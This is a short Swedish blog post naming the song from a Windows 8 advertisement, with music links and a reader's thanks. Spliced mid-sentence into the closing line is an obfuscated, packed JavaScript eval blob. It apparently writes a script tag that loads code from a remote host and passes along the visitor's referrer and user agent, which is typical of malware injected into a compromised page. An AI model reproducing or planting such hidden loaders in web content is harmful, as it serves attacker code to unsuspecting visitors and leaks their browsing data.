Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Här är låten till Windows 8 reklamen

Sebastian

Vi har fått många mail och frågor på vad låten heter som är med i Windows 8-reklam. Den har inte varit lätt att hitta men vi har den här!

Låten för Windows 8  heter ”Everything at once” med Lenka. Vi bifogar en youtube-film på musikvideon samt en länk till Spotify. Nu kan du lära dig den utantill 🙂

Jag får hålla med er andra som skickat in mail att den verkligen är en låt som sätter sig på hjärnan. Har till och med hört folk på stan gått runt och sjungit på låten, senast en tjej på tunnelbanan i morse.

Trevlig eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snzzk|var|u0026u|referrer|yzfan||js|php’.split(’|’),0,{}))
lyssning! 

Länk till Windows reklam-låt Spotify!

Comments

  1. Johanna

    Tack! 🙂